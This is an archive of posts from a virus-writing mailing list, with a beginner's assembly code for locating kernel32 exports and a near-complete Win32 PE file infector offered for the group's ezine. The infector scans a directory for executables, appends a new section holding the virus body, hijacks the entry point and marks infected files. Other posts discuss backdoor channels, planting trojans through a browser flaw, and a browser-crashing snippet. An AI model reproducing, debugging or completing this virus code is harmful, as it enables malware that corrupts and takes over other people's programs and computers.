man I read the articles and find out the ways to get the kernel32
base address on the hardcorded method and I done some GetProcAddress
search . But the problem in this is I got an exception . why was
that ?
my code is this .
First I write the code but the variables in the code segment are
read only thus I changet that segment attributes and try again
already then in I debugging on the ollydebug it faills when it scans
the 2Dh element of the export table of the Kernel32.dll what a fuck
is this ? Please help me man please ... Please ... I'm very curious
now . I just cant breath without assembly now . Please man help me
give me some drugs .


This is my source code .
------------------------------------------------code begins ------

     .586
     .model flat , stdcall
     option casemap : none
include c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


.code
start:
     call GetDelta
  GetDelta:
     pop ebp
     sub ebp , OFFSET GetDelta - OFFSET start
XPKernel32BaseAddress equ 77E60000h
     mov eax , XPKernel32BaseAddress
     call CheckForK32
     cmp eax , 0000000h
     jne  ExitLoop
     mov eax , XPKernel32BaseAddress
     call GetApiAddress
     ;; now we are going to print a messageBox
     invoke ExitProcess , 0





ExitLoop:
     ;; return to the host code in our virus .

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CheckForK32 proc
     cmp word ptr [ eax ] , 'ZM'
     jne NotFound
     add eax , 3ch
     mov eax , [eax]
     add eax , XPKernel32BaseAddress
     cmp word ptr [ eax ] , 'EP'
     jne NotFound
     xor eax  , eax
     ret
NotFound:
     ;; die
CheckForK32 endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
aPEHelder dd 0
aimportDir dd 0
aAddressTable dd 0
aNameTable dd 0
aOrdinalTable dd 0
nOfExports dd 0
sGetProcAddress db 'GetProcAddress' ,0
aGetProcAddress dd 0

GetApiAddress proc
     ;; oky now we have to get the PE real address
     mov eax , [eax+3ch]
     mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
     add eax , XPKernel32BaseAddress
     mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
     ;; now there is PE helder address in the eax
     ;; we shall play with it .
     ;; Then we need is the place where VA of import dir is kept
     ;; it is on the 78h
     add  eax , 78h
     mov eax,dword ptr [ eax ]
     add eax , XPKernel32BaseAddress
     push eax
     mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
     ;;oky we are pointed to the import table in eax
     ;; oky then get the addresstableRVA
     add eax , 1ch
     mov eax , [eax]
     add eax , XPKernel32BaseAddress
     mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
     pop eax
     ;; oky now we shoud have the Name PTR table
     push eax
     add eax , 20h
     mov eax , dword ptr [eax]
     add eax , XPKernel32BaseAddress
     mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
     pop eax
     push eax
     ;;Now we should get the Ordinal table
     add eax , 24h
     mov eax , dword ptr [eax]
     add eax , XPKernel32BaseAddress
     mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
eax
     pop eax
     push eax
     ;; now we have to get nunber of exports
     add eax , 18h
     mov eax , dword ptr [eax]
     mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
     mov ecx , eax
     pop eax

     ;; Now we have to search for the APIs , Lets go
     ;; we shoud put the nOfExports to the ecx oky
     ;; virus leavaman sanaseama laba! .
     mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
     ;; now the eax is pointed to the first address of the string
name
     mov edx , 0
     lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
     mov ebx , esi
CheckNext:
     push edx
     shl edx , 2
     add eax , edx
     pop edx
     mov edi , dword ptr [ eax ]
     add edi , XPKernel32BaseAddress
     inc edx
     mov esi , ebx
CheckByte:
     ;; we have to compare the bytes in EDI with ESI
     cmpsb
     jne CheckNext
     cmp byte ptr [esi] , 0
     je  GotIt
     cmp edx , ecx
     je  ExitLoop        ;; what a shitt this is not kernel32 what a
fuck .
     jmp CheckByte
GotIt:
     ;; oky we now get that shitt . Oky now we have to store this
shitt
     ;; its on the count of edx +1
     ;; but in the loop it was already incremented .This is where
aAddressTable was need
     mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
     mov eax , [eax]
     push edx
     shl edx , 2
     add eax , edx
     pop edx
     mov eax , [eax]
     mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
     xor eax , eax
     xor edx , edx
     ret
GetApiAddress endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
end start

--------------------------------------------------------------------
please make sure to changet the attributes on the segments to full
access in order to avoid memory access violations under ollydbg.


oky man please help me man . I just a beaganner to the assembly
langaueg and virus writing . I need to go to the hell .
                                      by : sanzilla jackcat

sandundhammikaperera@...

Dear F-13 members,

I am planning to come out the new Ezine for 2008, what say you?


from lclee_vx

Sup everyone?  synged flesh here, checking out the forum.  Moaphie get
on irc or messenger sometime my emails are syngedflesh@... or
synge_dr@... so we can chat. :)

EOF Project is planning the VirCon. Check it out http://www.eof-
project.net.

Dear members,

Hopefully we will come out the new ideas/codes in 2008!!

Hai,

Just hosting the new website....I think this is the permanent domain
for me. For those members who are interesting to join the domain and
hosting for free..please contact me.

And i just delete some of the members not active in virus world
actually...sorry..dude...

New hosting - http://www.f13-labs.net

from lclee_vx

There is an interesting vulnerability in the default behavior of
Firefox built-in popup blocker. This vulnerability, coupled with an
additional trick, allows the attacker to read arbitrary user-
accessible files on the system, and thus steal some fairly sensitive
information.

http://www.securiteam.com/securitynews/5JP051FKKE.html
For full details.

Interesting, may be a way of planting trojan, etc...

I would use the HTTP protocol..
(just my opinon...) but then again,
I dont know much about DNS!/?

--- In F-13Labs@yahoogroups.com, "lclee_vx" <lclee_vx@...> wrote:
>
> Guy,
>
> I felt like if code the backdoor connect use DNS protocol is not
> powerful as use HTTP protocol.
>
>
>
> What say u?
>

Guy,

I felt like if code the backdoor connect use DNS protocol is not
powerful as use HTTP protocol.



What say u?

Hai, b00t_wizard

you can send your artworks to me in text, as we just collect the
source code only..or any proof of concept in articles.

yeah..and your real "nickname" and personal website as well.

now i quite busy in study the linux virus codes. if need to contact
me, just add me in Yahoo messenger, lclee_vx

or you have any suggestion in our Ezine?

as i plan in the Ezine, i will include some artwork as below:

1. virus/worm codes
2. proof of concept
3. interview vxers

cheer,
from lclee_vx


--- In F-13Labs@yahoogroups.com, lclee_vx <lclee_vx@...> wrote:
>
> hai, b00t_wizard,
>
> Welcome to F-13, if you really interesting in virus coding. Can
you send one of the artwork to me. We really looking for the person
who enjoy the virii code/worm code. And nice to meet you too.
>
>  Sorry because recently i am busy on others shit like linux
codes,injection blah blah...anyhow, i will update and add your name
in our members list. Welcome to F-13 Labs.
>
> from
> lclee_vx/F-13
>
>
>
>
>
>
> ----- Original Message ----
> From: b00t_wizard <b00t_wizard@...>
> To: F-13Labs@yahoogroups.com
> Sent: Thursday, January 4, 2007 12:58:43 PM
> Subject: [F-13Labs] New member ...just wanted to say whatsup!
>
> hey whats up all,
> I often visit vx chaos & while surfing below on his links,
> I saw the f-13labs website,
> (noticed its a virii group of somesort for coding/programming)
> I also am highly interested in coding,(as I code with vb6)
> I've written many applications, such as kiddie stuff for family,
> my current large process of an antivirus program,
> & have uploaded my first vprogram at vx chaos's website,
> I'd perfer not to say which one or so on,,,
> due to my privacy of not knowing some ppl & maybe soon enough i
will,
> the program is currently undetectable. ....
> I love the coding of virii & love collecting,
> I collect & create virii for my personal fun,
> I created my first virii & submitted it to mcafee through a sample,
> they sent me back an email saying it was undetected & that they
were
> sending it to a research lab,
> just as that,
> I am not trying in anyway to harm another persons computer system,
> (just as listed on the website)
>
> aNyWaYz...
> I'd like to chek out tha club & see how every1z doin,
> (tha activness & so on...)
> tha magazine sounds great!
> & I;d like more info on that...like how popular is it going to be
&
> whatever else.
> thanks for the invite if that was an invite & I plan on helping
out
> as much as I can & getting highly sociable with ppl in this group.
>
>
>
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam?  Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
>

hey...whats up guys...
just found my way back into the F-13 LAB!
I'll check back tomorrow....(gotta get some sleep)..

welcome...b00t wizard !

I received the letter from b00t_wizard, and we all welcome the joining
in F-13 Labs.

And sorry because recently i busy on the injection+pentest....will
back to coding soon..^-^

Moaphie misconceive.
I'm only interested in ReverseEngineer
But not a ReverseEngineer

For all the members,

One of my friend comment a lot the Ezine (which was published by other
vxer group).

hmm...i hope that we really come out something really interesting in
virus/worm, reverse engine, web security programming...

guys, noted that.

regards,
lclee_vx

nice code, but i hope that you can post some picture here...:p



--- In F-13Labs@yahoogroups.com, "samuriantarsanitari"
<samuriantarsanitari@...> wrote:
>
> Did you try to change body.innerHTML with javascript yet
> it may work on Other WebBrowser(TestedWithOpera) except IE it will
> show you
> IE cannot open the ...
> Operation Aborted
>
> Yes it will show this only remote file.
> I don't know it's an IE security or LogicalError.
>
> But U can use this code to block IE such
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN" "http:/
> /www.w3.org/TR/html4/loose.dtd">
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-
> 11">
> <title>BlockIE</title>
> </head>
> <body>
> The body
> </body>
> <script language="javascript">
> document.body.innerHTML+=" ";
> </script>
> </html>
>
>
>
>
> Enjoy coding.
>

raf_avp...nope...i know nothing about GO programming..may be you post
soem code here...:)








--- In F-13Labs@yahoogroups.com, "raf_avp" <raf_avp@...> wrote:
>
> hi,,~~
>
>     do you know the game GO,also named wei-chi.In china,it's very
> popular.I like GO,but i like the GO programming more,especially the
AI
> sillis in the programming, guys, what about you,,,,:D
>

This is the code i am going to publish in our ezine, the code will
infect the lclee.exe (normal file system) and add the new section.
Hmmmm...i hope that someone help me to debug or comment it bfore i
publish in our ezine...all the member...keep it moving ..:)
------------------------------------------------------



.386p
.model flat, stdcall
option casemap:none

.data

.code
VirusStart:

	 call Delta

Delta:
	 pop  ebp
	 mov  ebx, ebp
							 ;ebx=ebp

	 sub  ebp, offset Delta


	 sub  ebx, RubbishSize
						 ;ebx=ImageBase
	 sub  ebx, 1000h
	 mov  dword ptr [ebp+offset ModuleAddress], ebx
			 ;save

	 mov  esi, [esp]
							 ;get the
current Address
	 and  esi, 0FFFF0000h

	 call GetK32
	 mov  dword ptr [ebp+offset KernelAddr], esi
			 ;save the address of Kernel32.dll

	 call GetApis
	 call SpecialApi
	 call  DirectoryScan

	 cmp  ebp, 0
	 je  FirstGeneration
	 call FirstGeneration

ReturnHost:

	 mov  eax, dword ptr [ebp+offset OldEip]
	 jmp  eax
	 ret
;--------------------------------------------------------------------
----------------------------
;Directory scanning the files we are going to infect
;--------------------------------------------------------------------
----------------------------
DirectoryScan proc

	 lea  eax, [ebp+offset CurtDirectory]
				 ;get the address of current directory
	 push eax
	 push max_path
						 ;load the size of
directory=260
	 mov  eax, dword ptr [ebp+offset
aGetCurrentDirectoryA]
	 call eax

	 lea  eax, [ebp+offset CurtDirectory]
	 push eax
	 mov  eax, dword ptr [ebp+offset
aSetCurrentDirectoryA] ;set to current directory
	 call eax
	 mov  dword ptr [ebp+offset Counter], 3
				 ;set the counter=3, target maximum 3
files
	 call SearchFiles
						 ;jump to search the
files

	 ret

DirectoryScan endp

;--------------------------------------------------------------------
---------------------------
;This is the routine to search the target files
;--------------------------------------------------------------------
----------------------------
SearchFiles proc

	 push ebp
							 ;save ebp
	 lea  eax, dword ptr [ebp+offset W32FindData]
			 ;load the Win32_Find_Data structure
	 push eax
	 lea  eax, [ebp+offset Mark]
					 ;target file "*.exe"
	 push eax
	 mov  eax, dword ptr [ebp+offset aFindFirstFileA]
			 ;start searching target file
	 call eax
	 pop  ebp

	 ;save the original ebp

	 inc  eax

	 ;eax+1
	 jz  SearchClose

	 ;"FindFirstFile" error?
	 dec  eax
								 ;get
the original eax
	 mov  dword ptr [ebp+offset SearchHandle], eax
			 ;save the SearchHandle

	 mov  esi, offset W32FindData.FileName
				 ;esi = filename
	 add  esi, ebp
	 mov  dword ptr [ebp+offset FilePointer], esi
			 ;save it
	 call InfectFile
						 ;jump to infect file

	 dec  dword ptr [ebp+offset Counter]
				 ;Counter-1
	 cmp  dword ptr [ebp+offset Counter], 0
				 ;Counter=0??
	 je  SearchHandleClose
						 ;close searching

SearchNext:
	 push ebp
							 ;save ebp
	 mov  eax, dword ptr [ebp+offset W32FindData]
			 ;eax= Win32_Find_Data structure
	 push eax
	 mov  eax, dword ptr [ebp+offset SearchHandle]
			 ;eax=SearchHandle
	 push eax
	 mov  eax, dword ptr [ebp+offset aFindNextFileA]
			 ;start next searching
	 call eax
	 pop  ebp

	 cmp  eax, 0

	 ;FindNextFile error??
	 je  SearchHandleClose
						 ;close searching

	 mov  esi, offset W32FindData.FileName
				 ;esi=filename
	 add  esi, ebp
	 mov  dword ptr [ebp+offset FilePointer], esi
			 ;save it
	 call InfectFile

	 dec  dword ptr [ebp+offset Counter]
				 ;Counter-1
	 cmp  dword ptr [ebp+offset Counter], 0
				 ;Counter=0?
	 jne  SearchNext

SearchHandleClose:
	 push ebp
							 ;save ebp
	 push dword ptr [ebp+offset SearchHandle]
	 mov  eax, dword ptr [ebp+offset aFindClose]
			 ;close the searching
	 call eax
	 pop  ebp

	 cmp  eax, 0
							 ;error??
	 je  SearchClose

SearchClose:
	 ret

SearchFiles endp

;--------------------------------------------------------------------
----------------------------
;Infect the *.exe files
;ecx=original filesize
;esi=Filename pointer
;--------------------------------------------------------------------
----------------------------
InfectFile:
	 pushad
	 mov  dword ptr [ebp+offset InfectFlag], 0h
			 ;mark the infectFlag=0

	 push esi
							 ;esi=pointer
to FileName
	 mov  eax, dword ptr [ebp+offset
aGetFileAttributesA]  ;get the file attribute
	 call eax

	 cmp  eax, -1
							 ;error??
	 jz  InfectFail
	 mov  dword ptr [ebp+offset OriFileAttribute], eax
		 ;save it

	 push 00000080h
						 ;set "Any"
	 push dword ptr [ebp+offset FilePointer]
	 mov  eax, dword ptr [ebp+offset
aSetFileAttributesA]  ;set the file attribute
	 call eax

	 cmp  eax, 0
							 ;error??
	 jz  ErrorOpenExe
						 ;jump out

	 push 0h
	 push 80h
	 push 00000003h
	 push 0h
	 push 0h
	 push 0c0000000h
	 push dword ptr [ebp+offset FilePointer]
	 mov  eax, [ebp+offset aCreateFileA]
				 ;open the target file
	 call eax

	 cmp  eax, -1
							 ;error?
	 jz  ErrorOpenExe
	 mov  dword ptr [ebp+offset FileHandle], eax
			 ;save the FileHandle

	 mov  ecx, [W32FindData.FileSizeHigh+ebp]
				 ;ecx=lpFileSizeHigh
	 push ecx
	 push eax

	 ;eax=FileHandle
	 mov  eax, [ebp+offset aGetFileSize]
	 call eax
							 ;eax=FileSize

	 cmp  eax, -1
	 jz  ErrorBuffer
	 mov  dword ptr [ebp+offset OriFileSize], eax

	 add  eax, SecVirSize+SecVirPadd
					 ;add extra size=2000h
	 push eax
	 push 40h

	 ;GMEM_FIXED=0 or GMEM_ZEROINIT=0040h
	 mov  eax, [ebp+offset aGlobalAlloc]
				 ;allocate the specified bytes
	 call eax
							 ;in the heap

	 cmp  eax, 0
							 ;error??
	 jz  ErrorBuffer
	 mov  dword ptr [ebp+offset MemoryHandle], eax
			 ;save it

	 xor  eax, eax
	 lea  eax, dword ptr [ebp+offset ByteRead]
			 ;load the ByteRead
	 push 0h
	 push eax
	 push dword ptr [ebp+offset OriFileSize]
	 push dword ptr [ebp+offset MemoryHandle]
	 push dword ptr [ebp+offset FileHandle]
	 mov  eax, [ebp+offset aReadFile]
					 ;read data from the file
	 call eax

	 cmp  eax, 0
							 ;error??
	 jz  ErrorReadExe

	 mov  esi, [ebp+offset MemoryHandle]
				 ;esi=memory handle address
	 cmp  word ptr [esi], "ZM"
					 ;checking MZ signature
	 jnz  ErrorReadExe
	 mov  eax, [esi+3ch]
						 ;eax=offset PE Header
	 add  esi, eax
							 ;esi=pointer
to PE Header
	 cmp  dword ptr [esi], "EP"
					 ;PE file??
	 jz  StartInfect
							 ;start
infect the files
	 mov  dword ptr [ebp+offset InfectFlag], 0FFh
			 ;put the error mark
	 jmp  ErrorReadExe

StartInfect:
	 cmp  dword ptr [esi+4ch], "chan"
					 ;file infected
	 jz  ErrorReadExe
	 mov  dword ptr [esi+4ch], "chan"
					 ;mark the infected file
	 mov  dword ptr [ebp+offset PEHeaderExe], esi
			 ;save the PE Header

;---------
;here we start adjust Original PE Header parameter
;-------------
	 xor  eax, eax
	 mov  ax, word ptr [esi+06h]
					 ;original No.Of.Section
	 mov  dword ptr [ebp+offset OriSection], eax
			 ;save it
	 inc  word ptr [esi+06h]
						 ;No.Of.Section+1

	 mov  eax, [esi+28h]
						 ;eax=Original
AddressOfEntryPoint
	 add  eax, [esi+34h]
						 ;eax=Original
AddressOfEntryPoint+


	 ;Original ImageBase
	 mov  dword ptr [ebp+offset OldEip], eax
				 ;save it

	 mov  eax, [esi+50h]
						 ;eax=Original
SizeOfImage
	 mov  [esi+28h], eax
						 ;update the New
AddressOfEntryPoint
	 mov  dword ptr [ebp+offset OriImageSize], eax
			 ;save it

	 add  eax, SecVirSize
						 ;size new section,
enough..:)!!
	 mov  [esi+50h], eax
						 ;New SizeOfImage

;---------------------
;now we point to the last section header
;esi= pointer PE Header
;-----------------------------------
	 add  esi, 0F8h
							 ;point to
section header
	 mov  eax, 28h
							 ;section
header size
	 mov  ecx, [ebp+offset OriSection]
				 ;original No.Of.Section
	 mul  ecx

	 ;eax=eax*ecx
	 add  esi, eax
							 ;esi=Point
to Last Section Header
	 mov  dword ptr [ebp+offset LastSectionHeader], eax
		 ;save it

	 assume esi:ptr PESection
	 mov  dword ptr [esi].nsname, "lych"
				 ;name
	 mov  eax, SecVirSize
						 ;eax=New Section
VirtualSize
	 mov  [esi].nsvirtualsize, eax
	 mov  eax, [ebp+offset OriImageSize]
				 ;eax=Original SizeOfImage
	 mov  [esi].nsRVA, eax
	 mov  eax, VirusSize
						 ;eax=virus length
	 mov  [esi].nsphysicalsize, eax
	 mov  eax, [ebp+offset OriFileSize]
				 ;eax=original FileSize
	 mov  [esi].nsphysicaloffset, eax
	 mov  eax, Char
	 mov  [esi].nsflags, eax
	 ;set section Read, Write, Executable
	 assume esi:
;-----------------
;start copy virus body
;--------------------
	 mov  edi, [ebp+offset MemoryHandle]
	 mov  eax, [ebp+offset OriFileSize]
	 add  edi, eax

	 ;edi=MemoryHandle+OriFileSize
	 mov  esi, offset VirusStart
	 add  esi, ebp
							 ;esi=point
to VirusStart
	 mov  ecx, VirusSize
	 rep  movsb
							 ;start copy
virus body to target files

	 push 0h
	 push 0h
	 push 0h
	 push dword ptr [ebp+offset FileHandle]
	 mov  eax, [ebp+offset aSetFilePointer]
	 call eax

	 mov  eax, VirusSize
	 mov  ecx, [ebp+offset OriFileSize]
	 add  ecx, eax

	 ;ecx=VirusSize+OriFileSize
	 lea  eax, dword ptr [ebp+offset ByteRead]
	 push 0h
	 push eax
	 push ecx
	 push dword ptr [ebp+offset MemoryHandle]
	 push dword ptr [ebp+offset FileHandle]
	 mov  eax, [ebp+offset aWriteFile]
	 call eax

InfectError:
ErrorReadExe:
	 push ebp
	 push dword ptr [ebp+offset MemoryHandle]
	 mov  eax, [ebp+offset aGlobalFree]
	 call eax
	 pop  ebp

ErrorBuffer:
	 push ebp
	 push dword ptr [ebp+offset FileHandle]
	 mov  eax, [ebp+offset aCloseHandle]
	 call eax
	 pop  ebp

ErrorOpenExe:
	 push ebp
	 push dword ptr [ebp+offset OriFileAttribute]
	 push dword ptr [ebp+offset FilePointer]
	 mov  eax, [ebp+offset aSetFileAttributesA]
	 call eax
	 pop  ebp
	 jmp  InfectCheck

InfectFail:
	 stc
	 jmp  JumpOut
InfectCheck:
	 cmp  dword ptr [ebp+offset InfectFlag], 0FFh
	 jz  InfectFail
	 clc

JumpOut:
	 popad
	 ret

;--------------------------------------------------------------------
----------------------------
;here we start to scan APIs functions "GetProcAddress"
and "LoadLibrary"
;and retrieve others APIs functions with GetProcAddress and
LoadLibrary
;
;Notes:
;AddressOfNames     = points to a table of function name string one
after another
;AddressOfFunctions = points to a table filled with function
addresses
;AddressOfOrdinals  = points to a table with the ordinal number or
each function
;--------------------------------------------------------------------
----------------------------
GetApis  proc

	 mov  eax, esi

	 ;eax=esi=address of kernel32.dll
	 add  eax, dword ptr [eax+3ch]
					 ;eax=Pointer to PE Header
	 mov  dword ptr [ebp+offset PEHeader], eax
			 ;save it
	 add  esi, dword ptr [eax+78h]
					 ;esi=point to ExportDirectory
	 mov  dword ptr [ebp+offset ExportDir], esi
			 ;save it

	 mov  edx, dword ptr [ebp+offset KernelAddr]
			 ;edx=Address of Kernel32.dll
	 add  edx, [esi+20h]
						 ;edx=AddressOfNames
	 mov  dword ptr [ebp+offset AddrOfNames], edx
			 ;save it

	 mov  ecx, dword ptr [esi+18h]
					 ;ecx=NumberOfNames
	 mov  dword ptr [ebp+offset NumOfNames], ecx
			 ;save it

	 lea  edi, word ptr [ebp+offset ImportantApis]
			 ;edi=API functions we need
	 xor  eax, eax
							 ;set the
index counter eax=0

SearchApiName:
	 mov  esi, dword ptr [ebp+offset KernelAddr]
			 ;esi=Address of Kernel32.dll
	 add  esi, [edx+eax*4]
						 ;get address for
next api name in


	 ;kernel32.dll

@Step1:
	 pushad
							 ;save all
the register
	 xor  edx, edx
							 ;edx=0
	 mov  edx, dword ptr [edi]
					 ;load the Api functions need
into edx
	 cmp  edx, 12345678h
						 ;ended?? Refer
to "ImportantApis" structure
	 jz  GetOut1
							 ;jump to end
of routine

@Step2:
	 xor  eax, eax
							 ;eax=0
	 lodsb
	 						 ;esi-->eax,
take a character, ie:"_X"
	 mov  ah, al
							 ;move it
left, ie:"X __"
	 mov  al, 0
	 sub  edx, eax

	 cmp  eax, 0
							 ;eax=0??
	 jz  @Step3
	 xor  ax, ax
							 ;ax=0
	 lodsb
							 ;esi-->eax,
take a character, ie:"_Y"
	 sub  edx, eax
	 cmp  eax, 0
							 ;eax=0
	 jnz  @Step2

@Step3:
	 test edx, edx
						 ;edx=0?, we get the
checksum match?
	 jz  FoundApi
	 popad
							 ;save back
all the register
	 inc  eax

	 ;eax+1
	 cmp  eax, dword ptr [ebp+offset NumOfNames]
			 ;compare with the NumberOfNames
	 jge  GetOut
							 ;jump out
from the routine
	 jmp  SearchApiName

;Here we apply two formula to retrieve the address of the API
functions we need
;eax = The index into the Address of Ordinals
;
;Formula 1: eax*2+[AddressOfNameOrdinals]=Ordinal
;Formula 2: Ordinal*4+[AddressOfFunctions]=Address of Function (RVA)
;

FoundApi:
	 popad
							 ;save back
all the register
	 mov  esi, dword ptr [ebp+offset ExportDir]
			 ;esi=point to ExportDir
	 mov  edx, dword ptr [ebp+offset KernelAddr]
			 ;edx=Address of Kernel32.dll
	 add  edx, [esi+24h]

	 ;edx=AddressOfNameOrdinals
	 movzx eax, word ptr [edx+eax*2]
				 ;Apply Formula 1

	 mov  edx, dword ptr [ebp+offset KernelAddr]
			 ;edx=Address of Kernel32.dll
	 add  edx, [esi+1ch]

	 ;edx+AddressOfFunctions
	 mov  esi, dword ptr [ebp+offset KernelAddr]
	 add  esi, [edx+eax*4]
	 mov  eax, esi
							 ;eax=address
of functions

	 add  edi, 4
	 stosd
							 ;save eax --
>edi
	 xor  eax, eax
	 mov  edx, dword ptr [ebp+offset AddrOfNames]

	 jmp  SearchApiName

GetOut1:
	 popad
GetOut:

	 ret

GetApis endp

;--------------------------------------------------------------------
----------------------------
;call the special api function in User32.dll
;--------------------------------------------------------------------
----------------------------
SpecialApi proc

	 lea  eax, [ebp+offset User32Dll]

	 push eax
	 mov  eax, dword ptr [ebp+offset aLoadLibraryA]
	 call eax



	 lea  esi, [ebp+offset sMessageBoxA]
	 push esi
	 push eax
	 mov  eax, dword ptr [ebp+offset aGetProcAddress]
	 call eax


	 mov  dword ptr [ebp+offset aMessageBoxA], eax

	 ret

SpecialApi endp
;--------------------------------------------------------------------
----------------------------
;This routine is scan Kernel32.dll address
;
;Notes:
;-------
;we set the esi+IMAGE_DOS_HEADER.e_lfanew < 4096byte (1000h), its
impossible the size of Dos Header
;plus Stub > 4096byte, correct me if i wrong :p
;
;the code "test ax, 0f000h" that mean we check the value for "0xxx",
x=value 0,1
;--------------------------------------------------------------------
----------------------------
GetK32  proc
	 push eax

Step1:
	 dec  esi

	 ;Checking every byte
	 mov  ax, [esi+3ch]

	 ;ax=esi+IMAGE_DOS_HEADER.e_lfanew
	 test ax, 0f000h
						 ;ax < 4096byte
	 jnz  Step1
	 cmp  esi, [esi+eax+34h]
						 ;esi=IMAGEBASE ??
	 jnz  Step1
	 pop  eax

	 ;save the original eax

	 ret

GetK32 endp

;--------------------------------------------------------------------
----------------------------
;parameters
;
;Notes:
;1. For ImportantAPIs, the 100h ~ FFh (1 word)
;--------------------------------------------------------------------
----------------------------
max_path 		 equ 260


ModuleAddress 	 dd 00000000h
OldEip 			 dd 00000000h
Counter 			 dd 00000000h
KernelAddr 		 dd 00000000h
PEHeader 		 dd 00000000h
ExportDir 		 dd 00000000h
AddrOfNames 		 dd 00000000h
NumOfNames 		 dd 00000000h
SearchHandle 	 dd 00000000h
FilePointer 		 dd 00000000h
OriFileSize 		 dd 00000000h
InfectFlag 		 dd 00000000h
OriFileAttribute  dd 00000000h
FileHandle 		 dd 00000000h
MemoryHandle 	 dd 00000000h
OriImageSize 	 dd 00000000h
NewImageSize 	 dd 00000000h
LastSectionHeader  dd 00000000h
PEHeaderExe 		 dd 00000000h
OriSection 		 dd 00000000h
ByteRead 		 dd ?


WinDirectory 	 db max_path dup (?)
SysDirectory 	 db max_path dup (?)
CurtDirectory 	 db max_path dup (?)
Mark 			 db "lclee.exe", 0
User32Dll 		 db "User32.dll", 0

sMessageBoxA 	 db "MessageBoxA", 0
aMessageBoxA 	 dd 00000000h

ImportantApis:
sLoadLibraryA 	 dd "Lo"+"ad"+"Li"+"br"+"ar"+"yA"
aLoadLibraryA 	 dd 000000000h
sGetProcAddress 	 dd
	 "Ge"+"tP"+"ro"+"cA"+"dd"+"re"+"ss"
aGetProcAddress 	 dd 00000000h
sGetWindowsDirectoryA dd
	 "Ge"+"tW"+"in"+"do"+"ws"+"Di"+"re"+"ct"+"or"+"yA"
aGetWindowsDirectoryA dd 00000000h
sGetSystemDirectoryA dd
	 "Ge"+"tS"+"ys"+"te"+"mD"+"ir"+"ec"+"to"+"ry"+"A"*100h
aGetSystemDirectoryA dd 00000000h
sGetCurrentDirectoryA dd
	 "Ge"+"tC"+"ur"+"re"+"nt"+"Di"+"re"+"ct"+"or"+"yA"
aGetCurrentDirectoryA dd 00000000h
sSetCurrentDirectoryA dd
	 "Se"+"tC"+"ur"+"re"+"nt"+"Di"+"re"+"ct"+"or"+"yA"
aSetCurrentDirectoryA dd 00000000h
sFindFirstFileA 	 dd
	 "Fi"+"nd"+"Fi"+"rs"+"tF"+"il"+"eA"
aFindFirstFileA 	 dd 00000000h
sFindNextFileA 	 dd
	 "Fi"+"nd"+"Ne"+"xt"+"Fi"+"le"+"A"*100h
aFindNextFileA 	 dd 00000000h
sFindClose 		 dd
	 "Fi"+"nd"+"Cl"+"os"+"e"*100h
aFindClose 		 dd 00000000h
sGetFileAttributesA  dd
	 "Ge"+"tF"+"il"+"eA"+"tt"+"ri"+"bu"+"te"+"sA"
aGetFileAttributesA  dd 00000000h
sSetFileAttributesA  dd
	 "Se"+"tF"+"il"+"eA"+"tt"+"ri"+"bu"+"te"+"sA"
aSetFileAttributesA  dd 00000000h
sCreateFileA 	 dd
	 "Cr"+"ea"+"te"+"Fi"+"le"+"A"*100h
aCreateFileA 	 dd 00000000h
sGetFileSize 	 dd
	 "Ge"+"tF"+"il"+"eS"+"iz"+"e"*100h
aGetFileSize 	 dd 00000000h
sGlobalAlloc 	 dd
	 "Gl"+"ob"+"al"+"Al"+"lo"+"c"*100h
aGlobalAlloc 	 dd 00000000h
sReadFile 		 dd "Re"+"ad"+"Fi"+"le"
aReadFile 		 dd 00000000h
sSetFilePointer 	 dd
	 "Se"+"tF"+"il"+"eP"+"oi"+"nt"+"er"
aSetFilePointer 	 dd 00000000h
sWriteFile 		 dd
	 "Wr"+"it"+"eF"+"il"+"e"*100h
aWriteFile 		 dd 00000000h
sGlobalFree 		 dd
	 "Gl"+"ob"+"al"+"Fr"+"ee"
aGlobalFree 		 dd 00000000h
sCloseHandle 	 dd
	 "Cl"+"os"+"eH"+"an"+"dl"+"e"*100h
aCloseHandle 	 dd 00000000h
sExitProcess 	 dd
	 "Ex"+"it"+"Pr"+"oc"+"es"+"s"*100h
aExitProcess 	 dd 00000000h
						 dd 12345678h

filetime  STRUC
	 ;file time structure
				 FT_dwLowDateTime DD ?
				 FT_dwHighDateTime DD ?
filetime  ENDS


win32_find_data                 STRUC
          FileAttributes          DD ?              ; attributes
          CreationTime            filetime ?        ; time of creation
          LastAccessTime          filetime ?        ; last access time
          LastWriteTime           filetime ?        ; last
modificationm
          FileSizeHigh            DD ?              ; filesize
          FileSizeLow             DD ?              ; -"-
          Reserved0               DD ?              ;
          Reserved1               DD ?              ;
          FileName                DB max_path DUP (?) ; long filename
          AlternateFileName       DB 13 DUP (?)     ; short filename
